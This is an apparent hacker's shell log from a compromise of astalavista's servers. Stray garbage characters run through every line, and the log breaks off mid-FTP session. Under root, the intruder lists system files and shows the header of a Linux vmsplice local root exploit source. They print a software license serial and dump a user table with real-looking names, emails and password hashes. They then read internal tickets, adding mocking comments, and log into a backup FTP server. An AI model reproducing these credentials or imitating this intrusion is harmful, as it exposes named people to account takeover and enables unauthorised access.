drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 y) D# l- r* [$ |0 c
drwx—— 2 com com 4096 Jun 4 04:04 backups
t$ a( T9 F- Y$ g. s+ U( ~-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql! H" n" R4 j. q$ e, S; M" B
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system( ?2 s' L* Z# m, r* J
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history) r0 ~% {6 _% N8 O
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout$ `" q5 Y8 i: m4 T$ t& h- ?6 Y
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
2 K% \3 O7 h; o9 z. L-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
9 Q* d: l8 ~0 ^! R7 v& p$ d2 rdrwx–x–x 3 com com 4096 Jan 29 2008 domains
5 J, ~0 g+ _: V* D' H-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed' v2 z8 |, C& P) @" z
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
5 J F9 g i4 K2 x n8 ?4 c-rw——- 1 com com 69 Nov 18 2008 .lesshst6 X- {/ p( j. q) W" f, z
drwx—— 2 com com 4096 Sep 24 2007 mail. e6 i3 B" c# E$ g# `% v
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
. l+ `: _/ P2 k% z6 kdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
f) g( U4 S2 T% L/ g) V' t9 }lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
6 j! Q; ~$ X5 {+ N, ~-rw-r—– 1 com mail 34 Sep 24 2007 .shadow; G, a8 i: w6 u$ {; X0 C# p
drwx—— 2 com com 4096 Aug 26 2008 .ssh
% G9 l" P' u, d: Y0 ]1 Z) `2 l b-rwx—— 1 com com 8515 Feb 10 2008 t$ i5 T* S+ o1 D7 M, n* y2 r) \
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
" _ n& I$ [) P* l. f6 Vdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
& _4 Y: x% o$ U) Z' i+ v: K-rw-rw-r– 1 com com 617 May 20 2008 .toprc- A" c! X/ T; t' x7 e
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql0 o. B: w' ?" W) d$ c! O$ T
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
+ J& m `. P/ ^& J _4 F-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
5 {9 u1 D" z; R* i; }! ?+ D+ F* @
/ F& T: I% x8 nsh-3.2# head t.c
; W$ N* w% M3 l% N/*9 a+ l* e1 _8 x+ K0 ^! Q6 b1 t
* jessica_biel_naked_in_my_bed.c7 p) {) k+ p* Q3 o
*
0 ?+ o% }9 ]" \' w8 `+ p* A9 o* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
% D2 R0 i, l: t. l, H' G9 L* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.' q% i9 } c B* a- X
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
* ]5 C' B6 o5 B$ X7 ] X. f% w& V" q*
+ F% S9 X, Z; A2 C+ b1 p* Linux vmsplice Local Root Exploit6 r; k0 |% s7 Z' T( Q# R9 w1 q
* By qaaz( i7 f4 Y; S9 [ P0 A/ w4 h# B
*7 M: |$ Q, c$ f: k; H
0 n, c* w# z2 O3 U
sh-3.2# cd /( t; s7 ^$ `& B, u4 X
sh-3.2# ls -la7 `' A+ K3 s9 _, g- g
total 360# [8 |* U6 `! n; v+ M2 i
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
4 p: A- N$ L0 |' V3 e) k$ Ldrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 e/ q% }; }4 I1 O* v7 s-rw——- 1 root root 10240 Jun 3 02:39 aquota.group. i1 k# E$ V- F
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user- J; W7 R \( {
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
, B! |7 y# n4 l-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck& B' {7 q# R- e
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
+ ?7 k. g: W7 f8 t! m Y5 \drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
2 z# n1 |0 l7 _ f9 \ o! vdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
) `, y: E' k7 Idrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
0 a0 J! Z% j' q* L# Q3 ^9 ldrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev! O4 K1 L5 V* r/ K; W/ a
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc2 b# l4 q) G, Q( S2 @4 e$ x
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home G2 `4 l+ G8 D$ z a" A2 k' q
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf- l$ \% `" ~% _( N& h: |
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib' e3 T' W' S7 g4 {: o
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64' @- V9 t3 Z# |; p1 J/ a
drwx—— 2 root root 16384 Sep 11 2007 lost+found/ Z& p1 f/ A/ F8 m
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
. ^$ r6 p. D, Z" ]! K0 T) |drwxr-xr-x 2 root root 0 Jun 3 02:43 misc, X: Y" J7 e/ j9 X8 P' D! D
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
6 _( B" K' X" j' g( B* d: B/ f-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg, u8 K# r+ H$ v+ v g- v9 T
drwxr-xr-x 2 root root 0 Jun 3 02:43 net3 H, f4 ?. c/ V' j$ @
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
+ N) ]0 ~& _9 C6 fdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc$ r1 R& j) h( g4 h, c" Z( J
drwxr-x— 15 root root 4096 Jun 4 08:40 root$ K8 C8 v2 c5 V" {
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin7 n8 m6 o1 F* n- _- }/ v8 b
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux3 O" A# R) h' n3 r$ r3 X
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
/ `5 I& m+ ~3 ?/ g5 r6 N+ j- Y" odrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
0 y/ G% M# ~# b" c, c# bdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
5 y; r+ h$ [' u4 \1 Ldrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr) X. T& ^4 k* j% E: O9 v$ W: }! S
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var( u: D8 t1 j' k9 s$ o% U$ N1 C" A( b
6 e K% r1 H+ z$ n2 B' F0 }sh-3.2# cd opt' i/ ^ k N+ P& W
sh-3.2# ls -la
# b5 N% c7 G* U+ m! v0 L% Atotal 20( D) L/ x; H% U5 ]7 B
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
9 |# H5 _; G# _ Udrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' m4 P9 `2 |/ d2 [0 Gdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
: g) [1 s, h$ c* P2 f
* x! f# r. z+ J4 T0 x4 Nsh-3.2# cd lsws/
Z) W/ I5 M. p7 w4 ~- |7 ]" c( hsh-3.2# ls -la; A+ h0 c5 ~0 ?; V+ s& o
total 108
4 n1 w: T. a5 v: ]$ |; @! H1 rdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
3 q; G6 p2 ~# Vdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..# \4 B+ L) Q3 ]0 c
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons P0 \/ x& \$ {: P6 v2 i) Z
drwxr-xr-x 13 root root 4096 May 29 15:10 admin" ]5 v6 {, Y) u% X* e
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
6 T$ Z6 ~& V7 Z) X6 [drwxr-xr-x 2 root root 4096 May 29 15:10 bin
" i6 T4 p/ f, ^; Jdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
; i9 _1 k0 e: B, H! _drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT4 L$ Y1 a- I/ W- t
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
/ P% J. c% L4 Udrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
- a$ w+ a- m- U, a! Cdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
# f$ O- Q, d' X7 Y4 u+ V. U-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE* R7 w$ f. o- o- V
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP4 G( g, _% K7 L4 K1 a( a
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
3 h7 d/ x7 _( m7 |: a9 L; o-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP2 N* C) }, B7 z3 E& ~& G" ~0 n
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
% }! D; [ e/ j% a0 P Rdrwxr-xr-x 2 root root 4096 Mar 20 2008 php8 ~$ n# C7 L' Y
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
1 g* @2 e7 i, F x& p! o. Wdrwxr-xr-x 3 root root 4096 Mar 20 2008 share
2 E- r1 z' L- t/ Q. N-rw-r–r– 1 root root 6 May 29 15:10 VERSION
" @# k. ]5 Y2 b" L% O* a& m* z5 ~' L- I: `2 }# U H8 V
sh-3.2# cd conf
$ i0 P- A C* v$ Rsh-3.2# ls -la6 E- _& U! }! Y- k+ ^0 U! u
total 48
6 g* t* x7 O, c5 L# E {drwx—— 4 apache apache 4096 Jun 3 02:43 .
7 D* e. D% W* O4 odrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
4 f( s0 L& P2 _3 [$ ^drwx—— 2 apache apache 4096 Mar 20 2008 cert
1 ~1 i6 |7 T. f% i$ W E-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
$ N& t/ c- d* k/ H- m) g9 Z5 f-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
9 s8 \' e2 g( }; t-rw-r–r– 1 root apache 0 Jun 3 14:11 .last3 M6 O( y" p+ |' w9 G/ P
-rw——- 1 apache apache 256 May 29 15:10 license.key% G" U6 M6 q% b5 N8 L. M
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old& z& R: j: N$ x% j6 O9 v0 d
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
9 K4 F- K$ A4 ~: C-rw——- 1 apache apache 20 May 29 15:10 serial.no( j% Z6 U9 T I& i9 G- T; a8 Z& c
drwx—— 2 apache apache 4096 Mar 20 2008 templates+ L4 H# L, n6 S, v7 E5 j5 o
4 @0 h4 b. V2 o
sh-3.2# cat serial.no
5 e! C, I1 _) pIbDl-oVsO-CKqL-wVRa0 `2 U9 |# e; d- N4 f
) ?1 n4 U4 ]; wsh-3.2# mysql
: V6 {+ h' D, B( HWelcome to the MySQL monitor. Commands end with ; or \g.
3 g; `; Q! k0 t- |2 }: eYour MySQL connection id is 286844" M$ v& f5 ^# p% L! k0 t J6 J, f5 D! u
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
% g% S0 k( [0 r, `2 R {
7 Z; H6 ?% O' w, @: `* O- qType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: `6 O; {, L, N& [' ~
- S$ a8 C* C2 F3 @) q
mysql> show databases;
. `, x5 E' q6 ]: }: o, {8 {+———————–+
! |6 L) z) J4 c7 W L/ H| Database |
. U. W) }5 X0 a9 d& N, f+———————–+- p- y9 }/ J' \6 h) z3 T3 W0 O
| information_schema |1 \& C1 q! `8 t
| astanet_ads |
1 R) P# m9 g. F I4 c| astanet_mailing_lists |5 k3 x$ N, b+ U9 ?% E- `8 [/ `
| astanet_mediawiki |
) Y) P* R& _9 a, {| astanet_membersystem |$ s6 r2 O# I0 o3 \
| com_contrexx |
9 x3 f5 O+ g" r J3 E/ g| com_contrexx2 |
8 {' t$ o- m+ l' F& K* \% o' W| com_contrexx2_live |
: j7 R) j8 L3 N, }( P$ E7 c| da_roundcube |% o: P. j q# {% f
| dolphin |
8 ~* { K3 w" Y, a2 K- V h7 e" G& m| ideapool |: a2 w3 Z! B# X$ G
| mysql |) w: B8 d, L* k" ]1 |
| test |5 m8 N0 p) \6 o& K5 ?
| yourmaster |; ~# m+ [; ~- b _
+———————–+
+ X F: d9 @& f- N3 q/ h14 rows in set (0.00 sec)
* |0 ?+ s$ I9 D, E; W4 A6 {
* h( a8 I8 S! Q9 zmysql> use ideapool
0 B5 j" [, T1 ]; }Database changed
" r- ?. h+ B. u. J6 ?0 C: W" @( }, wmysql> show tables;
; g! S: T' ?6 {2 [& D) Y0 T% j+———————————–+" l$ G4 R: s6 J7 i' J& L
| Tables_in_ideapool |3 K6 k. Y d6 d$ d$ W" T9 Y
+———————————–+
+ i0 ]0 n( r* [9 i: y9 x6 y| eventum_columns_to_display | U2 a9 f7 ~4 Q" I9 U1 F2 E
| eventum_custom_field |
2 x3 y4 t2 @. ~" [$ a$ p| eventum_custom_field_option |
3 G- p) T T; @4 y| eventum_custom_filter |
$ B6 f5 d8 L* }! D- v4 Y) G, q| eventum_customer_account_manager |
7 @8 H* b' {- X9 \1 j7 ^| eventum_customer_note |& [) y, w# P9 H, {7 v" _6 S
| eventum_email_account |2 y6 z' ]2 c% H# V: ~3 D
| eventum_email_draft |
4 Y9 ^' W7 ~& c| eventum_email_draft_recipient |
# d: F3 ~; D/ D* q| eventum_email_response |
9 p! e' B& ]% g, x# || eventum_faq |$ x* l# _7 Q3 I! {, }0 U
| eventum_faq_support_level |. e- F) @$ n$ I8 m" d. ^ Z
| eventum_group |
5 Q, i/ Y$ j" u2 c I8 M- k| eventum_history_type |/ ^! c6 i/ {* T' S/ U2 G
| eventum_irc_notice |
; ^$ X( w4 {! P$ p- u# J; p4 a| eventum_issue |
8 Z8 U4 |' o$ V! L6 d* H5 w; I| eventum_issue_association |
7 X& h# R/ m- ^3 U, H5 ]1 Q| eventum_issue_attachment |
$ M; H+ L5 C: `0 N$ a- S| eventum_issue_attachment_file |
! @, H0 E# H" w c/ z+ V| eventum_issue_checkin |
3 W0 B- p# b0 `# U& E5 k# N| eventum_issue_custom_field |
9 g) X) N. f I/ {! h! T9 L6 y| eventum_issue_history |
_) e2 x3 C4 D' V! b2 l| eventum_issue_quarantine |
/ B" Y% H6 }/ O| eventum_issue_requirement |" l: `! e9 L1 Q3 J# ?: d
| eventum_issue_user |7 y i7 n. q8 |! C. ` b1 a
| eventum_issue_user_replier |. m w9 h6 `3 ^9 S9 j
| eventum_link_filter |9 J4 _# }2 Z% B& @/ S
| eventum_mail_queue |3 v' i9 A( J! }% U
| eventum_mail_queue_log |# \+ I0 V& K G+ ^
| eventum_news |
* B. Q7 L6 q- J/ P8 W/ y) a1 s! r| eventum_note |
# [. G$ {$ r- J! L: H* ?+ r| eventum_phone_support |
4 o6 h G9 |3 ]8 e" K| eventum_project |
* d$ X; O4 _* j. I& k| eventum_project_category |0 i8 [" C K( I- G1 N
| eventum_project_custom_field |
! e# F; N' I Q4 W' N0 y| eventum_project_email_response |
9 S% m" X* g% D' _5 m$ ?4 h/ y| eventum_project_field_display |- A" L5 O, O0 d. k" N# {6 R
| eventum_project_group |
8 u0 W! ?6 b9 g2 n| eventum_project_link_filter |
! h+ ^! e6 Y/ g% U+ B1 {| eventum_project_news |+ y* V1 k, A0 e( z
| eventum_project_phone_category |; `# p$ R N! {7 U* I. m4 a
| eventum_project_priority |
* v) {: }5 ]* G0 W0 O0 J| eventum_project_release |
) V2 I7 h6 Z- g$ ]. W+ b4 x| eventum_project_round_robin |
# _, n5 Y3 \6 V' u% M( a| eventum_project_status |# B( m" ^ E& B" c% @3 ^4 K( A
| eventum_project_status_date |3 l/ a" h3 ]" O* P
| eventum_project_user |7 G$ X, n* J% N/ I* `# c8 K
| eventum_reminder_action |* i- f* Q0 b5 U, q2 d
| eventum_reminder_action_list |
2 K& j J7 t3 c7 z+ w" [/ ~| eventum_reminder_action_type |
. k3 o: z7 I8 X* K* |) T- t" [' V| eventum_reminder_field |! z& b2 I0 l9 _7 q* g) {
| eventum_reminder_history |
4 G2 M- g, S! Z| eventum_reminder_level |) A, b( J+ X. a4 j
| eventum_reminder_level_condition |
1 v! ^0 i) F9 w E u$ U6 |4 D| eventum_reminder_operator |
, T* o1 b5 b+ K U! Y4 P0 q| eventum_reminder_priority |
1 A0 ?1 j* ?9 R4 c6 O' h- c" e| eventum_reminder_requirement |
& t4 @6 J4 i* ~0 _9 H7 y| eventum_reminder_triggered_action |
8 P7 o6 k: x' ?! F e| eventum_resolution |
. i& h3 @8 R' Q3 w| eventum_round_robin_user |
m: D1 ]" t/ H3 m4 p" x' j| eventum_search_profile |+ x2 g5 T U* b, M; x! w
| eventum_status |/ Q5 v* Y0 s) [6 U# \6 U0 e
| eventum_subscription |3 k/ p1 r8 E/ r0 l
| eventum_subscription_type |
6 H0 k; @( N* W' x+ w| eventum_support_email |, ]/ t- d4 f% H9 _" [* T4 w
| eventum_support_email_body |0 \ i5 I' d/ y, u
| eventum_time_tracking |0 H# ^; n; e5 v+ A3 t6 m
| eventum_time_tracking_category |
1 m @: d+ C! V% b: C& {, [| eventum_user |
; h4 P0 o$ _8 J! y& ]5 G% G+———————————–+
6 E- a$ P9 b7 U; e69 rows in set (0.00 sec): B% w9 e. d9 U4 F. ]4 y, E1 d
0 H, x: b5 y' p! I: kmysql> describe eventum_user;+ k0 W( N) W3 ]/ ^) M; y
+————————-+——————+——+—–+———————+—————-+ T3 B; V/ x4 \7 Z5 J7 h! }3 S
| Field | Type | Null | Key | Default | Extra |
9 Y* u& c- e3 p0 ]! L' q/ H+————————-+——————+——+—–+———————+—————-+" u# K4 @5 I* c9 M3 U
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
( A5 a' ]! K, k( A) R| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |" O9 ]2 [' i+ M G$ @/ j7 M
| usr_customer_id | int(11) unsigned | YES | | NULL | |
: g( X! b6 r3 G1 X7 O6 I| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |+ H. s+ ~2 g+ p, `7 _8 R
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |9 p; M% ?) U e, ]2 ]4 B
| usr_status | varchar(8) | NO | | active | |
# |4 z8 e/ J, z2 B3 D d| usr_password | varchar(32) | NO | | | |
8 `! \' E' F) r/ G c% b. Q| usr_full_name | varchar(255) | NO | | | |
1 C; N% S- T1 Y! G7 l1 t$ g| usr_email | varchar(255) | NO | UNI | | |' P/ W/ c6 ^, q4 \
| usr_preferences | longtext | YES | | NULL | |1 H k) Q6 H$ f& Q4 I
| usr_sms_email | varchar(255) | YES | | NULL | |2 Z- s4 m% }# K$ ~ ~
| usr_clocked_in | tinyint(1) | YES | | 0 | |/ B; L- X- k2 ~! y! C/ B- W
| usr_lang | varchar(5) | YES | | NULL | |3 Q- ~( [& _1 T9 x2 Q+ p) a" W$ x
+————————-+——————+——+—–+———————+—————-+
+ y( s% b- Q/ g, j2 ?13 rows in set (0.00 sec)3 F- d! b9 o& k. y" a9 D
" J4 ^ ?. |3 Q. T
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
8 N+ s8 R5 g- c3 H9 y, A1 y+———————-+——————————-+———————————-+
7 F. D7 J; V* p; ?6 ]$ s| usr_full_name | usr_email | usr_password |! c, l3 @ U) }0 e* y( P
+———————-+——————————-+———————————-+
5 }" x" x h/ d/ {6 m* a| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
2 r; `: v) I1 I' P" m- a| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
- H, Q0 t0 f! K| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |( c9 Y1 S, F0 e' _5 g
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |: v5 }1 G, r4 N' j8 d5 ]
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |& \) }- N. b5 j8 f4 J- g3 W
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |7 u( D8 n1 P% Q! |2 ?1 r7 m
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
0 f2 ]4 I$ Y+ K| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
4 m* Z. N* ?) V# `& d| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |2 p U+ J7 G: W/ ]/ [4 E7 o
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
! _8 a( `+ L3 Z, L0 c: J- q| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |8 V1 H+ i: W. @
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |# {7 ]0 ?7 I/ x; }
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |! q# \ B" E# w! R( W. k
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
, c3 B6 }' I5 K. q" c5 x1 {- |; o- B| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |: t3 o% P1 M" S3 z# B
+———————-+——————————-+———————————-+
+ j" ]6 \0 F1 `0 o3 L4 j% m15 rows in set (0.00 sec)
( S. S, [& e, b; L% s( u! }
3 o5 `; A+ Q) w! g& l% Q1 L+ Zmysql> select iss_description from eventum_issue where iss_id = 43;. a( p* H2 Z) z* u+ U; U$ B
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 l& X3 f {. [6 G% V6 _
| iss_description * h8 z( |# T P2 y8 y6 U: {- n0 m
|( k' r& y2 F; t( |0 I
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
' s3 [1 u; Z/ ` U: m/ z| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be- f8 F; O8 g5 Y# U
connected for 90 mins… 120mins… so what i propose is something like:
' f: N+ x+ i& M, ]! D3 ^/ K( g3 `链接标记[url]http://www.surfthechannel.com/[/url]
* S$ X; i" U W( s) Xsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system# o# a9 q$ y5 k5 y# A
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
u$ p) F: p; j {7 hbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
1 @1 r3 C3 {4 I4 N& {if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
- B6 N' q( ]8 A3 C' N5 k& ^( ]; [6 z
We could also put advertisement during play on the flash video player itself… extra $$…. t# W4 [5 [' c2 _6 g
! c; F. ` _; p9 ]: A6 E q! z: Y2 R
By sykadul |# f0 c' C7 A0 B$ b
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
- a) e3 }9 ?* V- i1 row in set (0.00 sec); c/ W# p4 s: H8 e
/ J' f0 S$ S" \- I+ Q
// Money and extra $$ is all they care about. remember that. z1 Y# M2 f; m& @% n. C
7 Y8 t7 i! t) f
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
( l7 S* `" H% e3 U+————————+——————————————————————————————————————————————————————————————————————————————-+
5 Q* G9 t, I9 y2 N* o4 w/ G/ h% e| iss_summary | iss_description
) M% Z: X7 h4 D4 l. t|$ K# \5 D1 R6 T% H
+————————+——————————————————————————————————————————————————————————————————————————————-+
1 `# U/ ~& N6 E7 W7 \" T| Forum for REAL EXPERTS | Hello,
' a6 s3 ?3 i/ n4 J$ z
! Q- ~7 }5 a7 y) v/ z( GIshtus and I,+ m$ ~* [4 B' I) C) s v5 [- e; s7 V1 ?
1 Y% j, h4 J5 N5 B* \% z& T1 I# d1 bCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide: L. l, ?+ C* H5 E( F
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
* a& Y- F* i: b0 L7 y; R7 B& J# G
3 \/ E- z1 a" ?One example a friend of mine from coresecurity.com!
1 `; y9 \6 v$ ]" ]+ @7 @0 o
. S! A" m& F6 r, \! dWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
1 |% Y& Y9 a- ~ m3 f c7 N9 G4 R
|
- G8 u) a! r8 H: X* }+————————+——————————————————————————————————————————————————————————————————————————————+
; l' P/ l& m6 t5 R& g3 @4 b1 row in set (0.00 sec)
7 A) |6 x6 O) h0 t" F v6 X% p+ N) l, G" S! _5 o2 b- |6 \
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
& }$ A5 E2 a$ n) k8 Q v T% j4 \+ h9 O. {& B! x9 n% s
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;6 @4 n% k: s( G
+——————+———————————————————————————————+2 O) u$ U1 Y4 h
| iss_summary | iss_description |
0 V( ?7 d5 \% k+——————+———————————————————————————————+) ?$ |3 i6 s, q6 y
| Website guidance | Virtual Girl which guides you trought the website." \4 z2 \9 R9 Z% n* ^: Y: i
2 M6 f6 O0 S! x; b; U3 AWe need a girl with who you can ( talk )!!!
1 z- C, d4 m8 E" r* kAlso for the News!- y' L4 a/ v- C1 b
So my suggestion is a girl who read you the news loud if you like!
4 ~9 w+ g- u) Z8 Y9 d. vyou can choose between read yourselfe or she read it for you or both!$ i$ Y* @; b; L
/ D0 O8 N2 Y9 w$ p, f) gGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!" p9 ^9 I/ D/ |7 Y0 k) J% F
# H) ], M' W7 } x# @" IHave a look on the example girls!!
* J2 I+ x( L8 l; O8 w/ K+ i) l( c
7 T: N" i4 B0 ^ X6 B. u3 d! i链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
2 P, L$ i! }0 }$ R Q3 q4 o/ V& T8 R) v- s a
or that% ~2 {" d0 A! w5 b9 }; k p
+ F A) i! o3 X0 N) V" G
链接标记[url]http://www.yellostrom.de/[/url]
" R+ e6 G# K5 v7 |: S- J
7 Q! g, J1 G( t|
0 q* F+ j/ s7 Q! U# |0 D5 Q+——————+———————————————————————————————+0 y) X0 `5 k- F& d, x
1 row in set (0.00 sec)" x# I% Q! b3 o& w! B1 U% @
5 M+ l/ J- W9 r5 w" @3 L// ha ha.! ^# i% N& N& g, _
" ~' g, H+ _' z7 U2 w0 R
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
7 f( C. {9 \& L( J4 J6 U+————————–+———————————————————————————————————–+
) j3 e* [0 W% P9 ?0 ^| iss_summary | iss_description |
9 p9 o' D# W! k7 b, u; I k- R" O+————————–+———————————————————————————————————–+5 ]9 c3 |% S# _+ i6 ~
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
x) y0 k/ w) x) N, J$ e# U& n+————————–+———————————————————————————————————–+1 i9 L5 ]: a: D- T
1 row in set (0.00 sec)
# t/ N3 t# O- h9 q/ z/ }1 M
9 w6 N7 j+ W5 y& e// LOL.
C* _1 J6 J, _. {. M+ V6 \9 Z% d" F/ d) J$ u( o
mysql> exit
" D3 ]- ]2 [4 w! J1 v3 s2 wBye
& G) s$ z* ^' q7 {# s# Q1 V- I" k# ]7 L: I( E8 L
sh-3.2# ftp 212.254.194.163, ]2 k/ V6 G" g. Q7 m! V
Connected to 212.254.194.163.
' Y% i% K+ I- u" M9 G: x220 BackupCOM_VW FTP server ready.; e+ x' p( `$ B5 A; n( T
504 AUTH: security mechanism ‘GSSAPI’ not supported.& B0 {! D8 o5 `9 P; Q W% N
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported." ^( E7 T0 a5 U( c8 ]. e6 R: t
KERBEROS_V4 rejected as an authentication type7 f# E& k; Q' ~3 w# g! ?0 V6 O; }8 B
Name (212.254.194.163:root): astalavista.com3 D) @# I7 |- L0 N
331 Password required for astalavista.com.+ W z \+ x2 f3 k8 j! B. \
Password:0 z. N1 ~- r8 _; Z5 l8 d
230 User astalavista.com logged in.
6 Y: d) r+ _+ Q& t7 X, gRemote system type is UNIX.4 `) a' X7 W3 o E3 ?1 B2 [
Using binary mode to transfer files.
4 E" P- R3 B" L- ?, k. F6 p3 W' Dftp> ls -la
2 k0 \$ E7 y4 I5 a9 N8 S227 Entering Passive Mode (212,254,194,163,2,188)6 x6 w* E$ M9 S" ?
150 Opening BINARY mode data connection for ‘file list’." N6 c5 j; K. G" l6 X3 z0 Q
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com2 w. k1 k- v _
226 Transfer complete.+ y0 A! @' n0 \; n8 F- z8 }- @9 ]7 i1 F+ ]4 x
ftp> cd astalavista.com
+ [0 V- j# D; t. s! }, D* v250 CWD command successful.7 k z6 A n3 l( W0 H; x
ftp> ls -la
* s! z7 J. y2 s+ E; n227 Entering Passive Mode (212,254,194,163,2,189)
